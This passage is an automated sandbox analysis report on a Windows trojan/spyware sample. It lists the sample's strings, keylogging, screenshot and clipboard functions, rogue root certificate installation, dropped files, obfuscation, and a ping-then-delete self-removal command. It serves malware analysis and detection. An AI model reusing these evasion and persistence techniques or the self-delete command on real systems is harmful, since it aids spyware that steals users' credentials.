Source: ecv71A3.tmp.1.dr String found in binary or memory: https://www.google.com/chrome/static/images/google-play-download.png
Source: ecv71A3.tmp.1.dr String found in binary or memory: https://www.google.com/chrome/static/images/homepage/google-beta.png
Source: ecv71A3.tmp.1.dr String found in binary or memory: https://www.google.com/chrome/static/images/homepage/google-canary.png
Source: ecv71A3.tmp.1.dr String found in binary or memory: https://www.google.com/chrome/static/images/homepage/google-dev.png
Source: ecv71A3.tmp.1.dr String found in binary or memory: https://www.google.com/chrome/static/images/homepage/google-enterprise.png
Source: ecv71A3.tmp.1.dr String found in binary or memory: https://www.google.com/chrome/static/images/homepage/hero-anim-bottom-left.png
Source: ecv71A3.tmp.1.dr String found in binary or memory: https://www.google.com/chrome/static/images/homepage/hero-anim-middle.png
Source: ecv71A3.tmp.1.dr String found in binary or memory: https://www.google.com/chrome/static/images/homepage/hero-anim-top-right.png
Source: ecv71A3.tmp.1.dr String found in binary or memory: https://www.google.com/chrome/static/images/homepage/homepage_features.png
Source: ecv71A3.tmp.1.dr String found in binary or memory: https://www.google.com/chrome/static/images/homepage/homepage_privacy.png
Source: ecv71A3.tmp.1.dr String found in binary or memory: https://www.google.com/chrome/static/images/homepage/homepage_tools.png
Source: ecv71A3.tmp.1.dr String found in binary or memory: https://www.google.com/chrome/static/images/homepage/laptop_desktop.png
Source: ecv71A3.tmp.1.dr String found in binary or memory: https://www.google.com/chrome/static/images/icon-announcement.svg
Source: ecv71A3.tmp.1.dr String found in binary or memory: https://www.google.com/chrome/static/images/icon-file-download.svg
Source: ecv71A3.tmp.1.dr String found in binary or memory: https://www.google.com/chrome/static/images/mac-ico.png
Source: ecv71A3.tmp.1.dr String found in binary or memory: https://www.google.com/chrome/static/images/thank-you/thankyou-animation.json
Source: ecv71A3.tmp.1.dr String found in binary or memory: https://www.google.com/chrome/static/js/installer.min.js
Source: ecv71A3.tmp.1.dr String found in binary or memory: https://www.google.com/chrome/static/js/main.v2.min.js
Source: ecv71A3.tmp.1.dr String found in binary or memory: https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0
Source: ecv71A3.tmp.1.dr String found in binary or memory: https://www.googleadservices.com/pagead/conversion.js
Source: ecv71A3.tmp.1.dr String found in binary or memory: https://www.googleadservices.com/pagead/conversion_async.js
Source: ecv71A3.tmp.1.dr String found in binary or memory: https://www.googleadservices.com/pagead/p3p.xml
Source: ecv71A3.tmp.1.dr String found in binary or memory: https://www.googletagmanager.com/gtag/js?id=UA-26908291-4
Source: ecv71A3.tmp.1.dr String found in binary or memory: https://www.googletagmanager.com/gtm.js?id=GTM-PZ6TRJB
Source: ecv71A3.tmp.1.dr String found in binary or memory: https://www.gstatic.com/external_hosted/autotrack/autotrack.js
Source: ecv71A3.tmp.1.dr String found in binary or memory: https://www.gstatic.com/external_hosted/lottie/lottie.js
Source: ecv71A3.tmp.1.dr String found in binary or memory: https://www.gstatic.com/external_hosted/modernizr/modernizr.js
Source: ecv71A3.tmp.1.dr String found in binary or memory: https://www.gstatic.com/external_hosted/scrollmagic/ScrollMagic.min.js
Source: ecv71A3.tmp.1.dr String found in binary or memory: https://www.gstatic.com/external_hosted/scrollmagic/animation.gsap.min.js
Source: aOn5CfTiwS.exe, 00000000.00000002.265153330.00000000101DE000.00000002.00000001.sdmp String found in binary or memory: https://www.instagram.com
Source: aOn5CfTiwS.exe, 00000000.00000002.265153330.00000000101DE000.00000002.00000001.sdmp String found in binary or memory: https://www.instagram.com/
Source: aOn5CfTiwS.exe, 00000000.00000002.265153330.00000000101DE000.00000002.00000001.sdmp String found in binary or memory: https://www.instagram.com/accounts/login/ajax/facebook/
Source: aOn5CfTiwS.exe, 00000000.00000002.265153330.00000000101DE000.00000002.00000001.sdmp String found in binary or memory: https://www.instagram.com/sec-fetch-dest:
Source: aOn5CfTiwS.exe, 00000000.00000002.265153330.00000000101DE000.00000002.00000001.sdmp String found in binary or memory: https://www.instagram.comreferer:
Source: aOn5CfTiwS.exe, 00000000.00000002.265153330.00000000101DE000.00000002.00000001.sdmp String found in binary or memory: https://www.messenger.com
Source: aOn5CfTiwS.exe, 00000000.00000002.265153330.00000000101DE000.00000002.00000001.sdmp String found in binary or memory: https://www.messenger.com/
Source: aOn5CfTiwS.exe, 00000000.00000002.265153330.00000000101DE000.00000002.00000001.sdmp String found in binary or memory: https://www.messenger.com/login/nonce/
Source: aOn5CfTiwS.exe, 00000000.00000002.265153330.00000000101DE000.00000002.00000001.sdmp String found in binary or memory: https://www.messenger.com/login/nonce/wd=488x1043;
Source: aOn5CfTiwS.exe, 00000000.00000002.265153330.00000000101DE000.00000002.00000001.sdmp String found in binary or memory: https://www.messenger.com/origin:
Source: aOn5CfTiwS.exe, 00000000.00000002.265153330.00000000101DE000.00000002.00000001.sdmp String found in binary or memory: https://www.messenger.comaccept-language:
Source: aOn5CfTiwS.exe, 00000000.00000003.259723561.0000000002301000.00000004.00000001.sdmp String found in binary or memory: https://www.namecheap.com/assets/img/nc
Source: aOn5CfTiwS.exe, 00000000.00000003.259758311.00000000034C1000.00000004.00000001.sdmp String found in binary or memory: https://www.namecheap.com/assets/img/nc-icon/favicon.ico

Key, Mouse, Clipboard, Microphone and Screen Capturing:

barindex
Contains functionality for read data from the clipboard
Source: C:\Users\user\AppData\Roaming\1612058829275.exe Code function: 1_2_0040AE4D OpenClipboard, 1_2_0040AE4D
Contains functionality to record screenshots
Source: C:\Users\user\Desktop\aOn5CfTiwS.exe Code function: 0_2_0042D3A8 GetObjectA,GetDC,CreateCompatibleDC,CreateBitmap,CreateCompatibleBitmap,GetDeviceCaps,GetDeviceCaps,SelectObject,GetDIBColorTable,GetDIBits,SelectObject,CreateDIBSection,GetDIBits,SelectObject,SelectPalette,RealizePalette,FillRect,SetTextColor,SetBkColor,SetDIBColorTable,PatBlt,CreateCompatibleDC,SelectObject,SelectPalette,RealizePalette,SetTextColor,SetBkColor,BitBlt,SelectPalette,SelectObject,DeleteDC,SelectPalette, 0_2_0042D3A8
Creates a DirectInput object (often for capturing keystrokes)
Source: ThunderFW.exe, 00000002.00000002.231958578.0000000000B5A000.00000004.00000020.sdmp Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
Potential key logger detected (key state polling based)
Source: C:\Users\user\Desktop\aOn5CfTiwS.exe Code function: 0_2_0043B0F0 GetKeyState,GetKeyState,GetKeyState, 0_2_0043B0F0

System Summary:

barindex
PE file has a writeable .text section
Source: aOn5CfTiwS.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Contains functionality to call native functions
Source: C:\Users\user\AppData\Roaming\1612058829275.exe Code function: 1_2_0040C516 NtQuerySystemInformation, 1_2_0040C516
Source: C:\Users\user\AppData\Roaming\1612058829275.exe Code function: 1_2_0040C6FB memset,CreateFileW,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,FreeLibrary, 1_2_0040C6FB
Detected potential crypto function
Source: C:\Users\user\Desktop\aOn5CfTiwS.exe Code function: 0_2_004A0004 0_2_004A0004
Source: C:\Users\user\Desktop\aOn5CfTiwS.exe Code function: 0_2_004443D4 0_2_004443D4
Source: C:\Users\user\AppData\Roaming\1612058829275.exe Code function: 1_2_00404BE4 1_2_00404BE4
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe Code function: 2_2_0095A0C3 2_2_0095A0C3
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe Code function: 2_2_00956A1E 2_2_00956A1E
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe Code function: 2_2_0095963B 2_2_0095963B
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe Code function: 2_2_0095A7BB 2_2_0095A7BB
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe Code function: 2_2_0095B51C 2_2_0095B51C
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe Code function: 2_2_00959B7F 2_2_00959B7F
Found potential string decryption / allocating functions
Source: C:\Users\user\Desktop\aOn5CfTiwS.exe Code function: String function: 004AA524 appears 37 times
PE file contains strange resources
Source: aOn5CfTiwS.exe Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: 1612058829275.exe.0.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 1612058829275.exe.0.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Sample file is different than original file name gathered from version info
Source: aOn5CfTiwS.exe Binary or memory string: OriginalFilename vs aOn5CfTiwS.exe
Source: aOn5CfTiwS.exe, 00000000.00000002.265153330.00000000101DE000.00000002.00000001.sdmp Binary or memory string: OriginalFilenameFsFilter.sys vs aOn5CfTiwS.exe
Source: aOn5CfTiwS.exe, 00000000.00000002.260587546.00000000004CA000.00000002.00020000.sdmp Binary or memory string: OriginalFilename" vs aOn5CfTiwS.exe
Source: aOn5CfTiwS.exe, 00000000.00000003.226629593.00000000022E7000.00000004.00000001.sdmp Binary or memory string: @shell32.dllSHGetSpecialFolderPathWSoftware\Microsoft\Windows\CurrentVersion\Explorer\Shell Foldersshlwapi.dllSHAutoComplete%2.2X%2.2X%2.2X&lt;&gt;&quot;&deg;&amp;<br><font size="%d" color="#%s"><b></b>\StringFileInfo\\VarFileInfo\Translation%4.4X%4.4X040904E4ProductNameFileDescriptionFileVersionProductVersionCompanyNameInternalNameLegalCopyrightOriginalFileName vs aOn5CfTiwS.exe
Source: aOn5CfTiwS.exe, 00000000.00000003.226629593.00000000022E7000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameEdgeCookiesView.exe@ vs aOn5CfTiwS.exe
Source: aOn5CfTiwS.exe Binary or memory string: OriginalFilename" vs aOn5CfTiwS.exe
Uses 32bit PE files
Source: aOn5CfTiwS.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
Yara signature match
Source: 00000000.00000002.265213011.0000000010249000.00000004.00000001.sdmp, type: MEMORY Matched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 00000000.00000002.261758124.0000000002880000.00000040.00000001.sdmp, type: MEMORY Matched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 0.2.aOn5CfTiwS.exe.2880000.2.unpack, type: UNPACKEDPE Matched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 0.2.aOn5CfTiwS.exe.2880000.2.raw.unpack, type: UNPACKEDPE Matched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 0.2.aOn5CfTiwS.exe.10000000.3.unpack, type: UNPACKEDPE Matched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: classification engine Classification label: mal80.troj.spyw.evad.winEXE@10/16@7/2
Source: C:\Users\user\Desktop\aOn5CfTiwS.exe Code function: CreateServiceA,GetLastError, 0_2_004072E8
Source: C:\Users\user\AppData\Roaming\1612058829275.exe Code function: 1_2_0040CE93 CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,OpenProcess,OpenProcess,memset,GetModuleHandleW,GetProcAddress,QueryFullProcessImageNameW,QueryFullProcessImageNameW,CloseHandle,Process32NextW,CloseHandle, 1_2_0040CE93
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe Code function: 2_2_00951058 CoCreateInstance, 2_2_00951058
Source: C:\Users\user\AppData\Roaming\1612058829275.exe Code function: 1_2_0040D9FC FindResourceW,SizeofResource,LoadResource,LockResource, 1_2_0040D9FC
Source: C:\Users\user\Desktop\aOn5CfTiwS.exe File created: C:\Users\user\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\6C0CE2DD0584C47CAC18839F14055F19FA270CDD Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5288:120:WilError_01
Source: C:\Users\user\Desktop\aOn5CfTiwS.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\exist_sign_install_r3
Source: C:\Users\user\Desktop\aOn5CfTiwS.exe File created: C:\Users\user\AppData\Local\Temp\xldl.dat Jump to behavior
Source: aOn5CfTiwS.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\AppData\Roaming\1612058829275.exe System information queried: HandleInformation Jump to behavior
Source: C:\Users\user\Desktop\aOn5CfTiwS.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Users\user\Desktop\aOn5CfTiwS.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\aOn5CfTiwS.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: aOn5CfTiwS.exe, 00000000.00000002.261758124.0000000002880000.00000040.00000001.sdmp Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
Source: aOn5CfTiwS.exe, 00000000.00000002.261758124.0000000002880000.00000040.00000001.sdmp Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: aOn5CfTiwS.exe, 00000000.00000002.261758124.0000000002880000.00000040.00000001.sdmp Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0
Source: aOn5CfTiwS.exe, 00000000.00000002.261758124.0000000002880000.00000040.00000001.sdmp Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: aOn5CfTiwS.exe, 00000000.00000002.261758124.0000000002880000.00000040.00000001.sdmp Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: aOn5CfTiwS.exe, 00000000.00000002.261758124.0000000002880000.00000040.00000001.sdmp Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: aOn5CfTiwS.exe, 00000000.00000002.261758124.0000000002880000.00000040.00000001.sdmp Binary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
Source: aOn5CfTiwS.exe Virustotal: Detection: 43%
Source: aOn5CfTiwS.exe Metadefender: Detection: 24%
Source: aOn5CfTiwS.exe ReversingLabs: Detection: 47%
Source: C:\Users\user\Desktop\aOn5CfTiwS.exe File read: C:\Users\user\Desktop\aOn5CfTiwS.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\aOn5CfTiwS.exe 'C:\Users\user\Desktop\aOn5CfTiwS.exe'
Source: unknown Process created: C:\Users\user\AppData\Roaming\1612058829275.exe 'C:\Users\user\AppData\Roaming\1612058829275.exe' /sjson 'C:\Users\user\AppData\Roaming\1612058829275.txt'
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe ThunderFW 'C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe'
Source: unknown Process created: C:\Windows\SysWOW64\cmd.exe cmd /c ping 127.0.0.1 -n 3 & del 'C:\Users\user\Desktop\aOn5CfTiwS.exe'
Source: unknown Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Users\user\Desktop\aOn5CfTiwS.exe Process created: C:\Users\user\AppData\Roaming\1612058829275.exe 'C:\Users\user\AppData\Roaming\1612058829275.exe' /sjson 'C:\Users\user\AppData\Roaming\1612058829275.txt' Jump to behavior
Source: C:\Users\user\Desktop\aOn5CfTiwS.exe Process created: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe ThunderFW 'C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe' Jump to behavior
Source: C:\Users\user\Desktop\aOn5CfTiwS.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c ping 127.0.0.1 -n 3 & del 'C:\Users\user\Desktop\aOn5CfTiwS.exe' Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{E2B3C97F-6AE1-41AC-817A-F6F92166D7DD}\InprocServer32 Jump to behavior
Source: aOn5CfTiwS.exe Static file information: File size 5007872 > 1048576
Source: C:\Users\user\Desktop\aOn5CfTiwS.exe File opened: C:\Users\user\AppData\Local\Temp\download\msvcr71.dll Jump to behavior
Source: Binary string: d:\MiniTP\Src\MiniThunderPlatform\pdb\ProductForCommon\MiniThunderPlatform.pdb source: MiniThunderPlatform.exe.0.dr
Source: Binary string: c:\Projects\VS2005\EdgeCookiesView\Release\EdgeCookiesView.pdb source: aOn5CfTiwS.exe, 00000000.00000003.226629593.00000000022E7000.00000004.00000001.sdmp, 1612058829275.exe, 00000001.00000002.224554347.000000000040F000.00000002.00020000.sdmp, 1612058829275.exe.0.dr
Source: Binary string: atl71.pdbT source: atl71.dll.0.dr
Source: Binary string: msvcr71.pdb\ source: msvcr71.dll.0.dr
Source: Binary string: atl71.pdb source: atl71.dll.0.dr
Source: Binary string: cmd_insert_server.icex-conference/x-cooltalk.movievideo/x-sgi-movievideo/x-msvideo.mxuvideo/vnd.mpegurl.qtvideo/quicktimevideo/mpeg.xmltext/xml.etxtext/x-setext.wmlstext/vnd.wap.wmlscript.wmltext/vnd.wap.wml.tsvtext/tab-separated-values.sgmtext/sgml.rtftext/rtf.rtxtext/richtext.txttext/plain.html.csstext/css.mshmodel/mesh.igsmodel/iges.xwdimage/x-xwindowdump.xpmimage/x-xpixmap.xbmimage/x-xbitmap.rgbimage/x-rgb.ppmimage/x-portable-pixmap.bgmimage/x-portable-graymap.pbmimage/x-portable-bitmap.pnmimage/x-portable-anymap.rasimage/x-cmu-raster.wbmpimage/vnd.wap.wbmp.djvimage/vnd.djvu.tiffimage/tiff.pngimage/png.jpgimage/jpeg.iefimage/ief.gifimage/gif.bmpimage/bmp.xyzchemical/x-xyz.pdbchemical/x-pdb.wavaudio/x-wavaudio/x-realaudio.arpmaudio/x-pn-realaudio-pluginaudio/x-pn-realaudio.m3uaudio/x-mpegurl.aifaudio/x-aiffaudio/mpeg.midiaudio/midiapplication/application/zip.xhtmlapplication/xhtml+xml.srcapplication/x-wais-source.ustarapplication/x-ustar.msapplication/x-troff-ms.meapplication/x-troff-me.manapplication/x-troff-man.texiapplication/x-texinfo.texapplication/x-tex.tclapplication/x-tclapplication/x-tar.sv4crcapplication/x-sv4crc.sv4cpioapplication/x-sv4cpio.sitapplication/x-stuffit.swfapplication/x-shockwave-flash.sharapplication/x-shar.shapplication/x-sh.latexapplication/x-latex.jsapplication/x-javascript.hdfapplication/x-hdf.gtarapplication/x-gtar.splapplication/x-futuresplash.dviapplication/x-dvi.cshapplication/x-csh.cpioapplication/x-cpio.pgnapplication/x-chess-pgn.vcdapplication/x-cdlink.bcpioapplication/x-bcpio.wmlscapplication/vnd.wap.wmlscriptc.wmlcapplication/vnd.wap.wmlc.wbxmlapplication/vnd.wap.wbxml.pptapplication/vnd.ms-powerpoint.xlsapplication/vnd.ms-excel.mifapplication/vnd.mif.smiapplication/smil.pdfapplication/pdf.odaapplication/oda.docapplication/msword.cptapplication/mac-compactpro.hqxapplication/mac-binhex40.ezapplication/andrew-inset source: download_engine.dll.0.dr
Source: Binary string: d:\MiniDownloadLib\branches\bin\Product Release\download_engine.pdb source: download_engine.dll.0.dr
Source: Binary string: f:\sys\objfre_wxp_x86\i386\FsFilter32.pdbpJ source: aOn5CfTiwS.exe, 00000000.00000002.265153330.00000000101DE000.00000002.00000001.sdmp
Source: Binary string: d:\MiniTP\Src\MiniThunderPlatform\pdb\ProductForCommon\MiniThunderPlatform.pdbt source: MiniThunderPlatform.exe.0.dr
Source: Binary string: d:\MiniTP\Src\MiniThunderPlatform\pdb\ProductForCommon\xldl.pdb source: xldl.dll.0.dr
Source: Binary string: msvcp71.pdb source: msvcp71.dll.0.dr
Source: Binary string: e:\xl7\Product Release\dl_peer_id.pdb0 source: dl_peer_id.dll.0.dr
Source: Binary string: f:\sys\objfre_wxp_x86\i386\FsFilter32.pdb source: aOn5CfTiwS.exe, 00000000.00000002.265153330.00000000101DE000.00000002.00000001.sdmp
Source: Binary string: d:\workspace\xlframework\win32_component\ThunderFW\Release\ThunderFW.pdb source: ThunderFW.exe, 00000002.00000000.231496774.000000000095C000.00000002.00020000.sdmp, ThunderFW.exe.0.dr
Source: Binary string: f:\sys\objfre_win7_amd64\amd64\FsFilter64.pdb source: aOn5CfTiwS.exe, 00000000.00000002.265153330.00000000101DE000.00000002.00000001.sdmp
Source: Binary string: e:\xl7\Product Release\dl_peer_id.pdb source: dl_peer_id.dll.0.dr
Source: Binary string: msvcr71.pdb source: msvcr71.dll.0.dr

Data Obfuscation:

barindex
Detected unpacking (creates a PE file in dynamic memory)
Source: C:\Users\user\Desktop\aOn5CfTiwS.exe Unpacked PE file: 0.2.aOn5CfTiwS.exe.2880000.2.unpack
Contains functionality to dynamically determine API calls
Source: C:\Users\user\AppData\Roaming\1612058829275.exe Code function: 1_2_0040D071 LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 1_2_0040D071
PE file contains an invalid checksum
Source: aOn5CfTiwS.exe Static PE information: real checksum: 0xeea28 should be: 0x4c8d48
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\aOn5CfTiwS.exe Code function: 0_2_0040D0E4 push 0040D110h; ret 0_2_0040D108
Source: C:\Users\user\Desktop\aOn5CfTiwS.exe Code function: 0_2_004421C4 push 0044221Eh; ret 0_2_00442216
Source: C:\Users\user\Desktop\aOn5CfTiwS.exe Code function: 0_2_0044526C push 00445298h; ret 0_2_00445290
Source: C:\Users\user\AppData\Roaming\1612058829275.exe Code function: 1_2_0040E2F1 push ecx; ret 1_2_0040E301
Source: C:\Users\user\AppData\Roaming\1612058829275.exe Code function: 1_2_0040E340 push eax; ret 1_2_0040E354
Source: C:\Users\user\AppData\Roaming\1612058829275.exe Code function: 1_2_0040E340 push eax; ret 1_2_0040E37C
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe Code function: 2_2_00953FB5 push ecx; ret 2_2_00953FC8

Persistence and Installation Behavior:

barindex
Installs new ROOT certificates
Source: C:\Users\user\Desktop\aOn5CfTiwS.exe Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\6C0CE2DD0584C47CAC18839F14055F19FA270CDD Blob Jump to behavior
Drops PE files
Source: C:\Users\user\Desktop\aOn5CfTiwS.exe File created: C:\Users\user\AppData\Local\Temp\download\dl_peer_id.dll Jump to dropped file
Source: C:\Users\user\Desktop\aOn5CfTiwS.exe File created: C:\Users\user\AppData\Local\Temp\download\download_engine.dll Jump to dropped file
Source: C:\Users\user\Desktop\aOn5CfTiwS.exe File created: C:\Users\user\AppData\Local\Temp\download\msvcp71.dll Jump to dropped file
Source: C:\Users\user\Desktop\aOn5CfTiwS.exe File created: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe Jump to dropped file
Source: C:\Users\user\Desktop\aOn5CfTiwS.exe File created: C:\Users\user\AppData\Local\Temp\download\msvcr71.dll Jump to dropped file
Source: C:\Users\user\Desktop\aOn5CfTiwS.exe File created: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe Jump to dropped file
Source: C:\Users\user\Desktop\aOn5CfTiwS.exe File created: C:\Users\user\AppData\Local\Temp\download\zlib1.dll Jump to dropped file
Source: C:\Users\user\Desktop\aOn5CfTiwS.exe File created: C:\Users\user\AppData\Local\Temp\download\atl71.dll Jump to dropped file
Source: C:\Users\user\Desktop\aOn5CfTiwS.exe File created: C:\Users\user\AppData\Roaming\1612058829275.exe Jump to dropped file
Source: C:\Users\user\Desktop\aOn5CfTiwS.exe File created: C:\Users\user\AppData\Local\Temp\xldl.dll Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

barindex
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Source: C:\Users\user\Desktop\aOn5CfTiwS.exe Code function: 0_2_0043A078 IsIconic,BeginPaint,DrawIcon,EndPaint, 0_2_0043A078
Source: C:\Users\user\Desktop\aOn5CfTiwS.exe Code function: 0_2_00441118 SendMessageA,SetClassLongA,IsIconic,InvalidateRect, 0_2_00441118
Source: C:\Users\user\Desktop\aOn5CfTiwS.exe Code function: 0_2_0043A1C4 IsIconic, 0_2_0043A1C4
Source: C:\Users\user\Desktop\aOn5CfTiwS.exe Code function: 0_2_0043B1BC SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow,ShowWindow, 0_2_0043B1BC
Source: C:\Users\user\Desktop\aOn5CfTiwS.exe Code function: 0_2_0043F2BC PostMessageA,PostMessageA,SendMessageA,GetProcAddress,GetLastError,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus, 0_2_0043F2BC
Extensive use of GetProcAddress (often used to hide API calls)
Source: C:\Users\user\AppData\Roaming\1612058829275.exe Code function: 1_2_0040C41D GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 1_2_0040C41D
Source: C:\Users\user\AppData\Roaming\1612058829275.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion:

barindex
Uses ping.exe to sleep
Source: unknown Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3 Jump to behavior
Contains functionality to detect sandboxes (mouse cursor move detection)
Source: C:\Users\user\Desktop\aOn5CfTiwS.exe Code function: GetCurrentThreadId,GetCursorPos,WaitForSingleObject, 0_2_0043E268
Found dropped PE file which has not been started or loaded
Source: C:\Users\user\Desktop\aOn5CfTiwS.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\download\dl_peer_id.dll Jump to dropped file
Source: C:\Users\user\Desktop\aOn5CfTiwS.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\download\download_engine.dll Jump to dropped file
Source: C:\Users\user\Desktop\aOn5CfTiwS.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\download\msvcp71.dll Jump to dropped file
Source: C:\Users\user\Desktop\aOn5CfTiwS.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\download\msvcr71.dll Jump to dropped file
Source: C:\Users\user\Desktop\aOn5CfTiwS.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe Jump to dropped file
Source: C:\Users\user\Desktop\aOn5CfTiwS.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\download\zlib1.dll Jump to dropped file
Source: C:\Users\user\Desktop\aOn5CfTiwS.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\download\atl71.dll Jump to dropped file
Source: C:\Users\user\Desktop\aOn5CfTiwS.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\xldl.dll Jump to dropped file
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: aOn5CfTiwS.exe, 00000000.00000002.265153330.00000000101DE000.00000002.00000001.sdmp Binary or memory string: vmware
